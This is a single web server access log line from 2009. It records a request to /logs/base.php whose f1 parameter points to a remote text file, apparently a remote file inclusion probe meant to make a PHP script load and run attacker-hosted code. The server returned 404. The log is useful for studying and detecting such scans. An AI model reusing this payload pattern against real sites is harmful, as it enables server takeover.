193.4.113.98 - - [14/Dec/2009:12:15:08 -0800] "GET /logs/base.php?f1=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
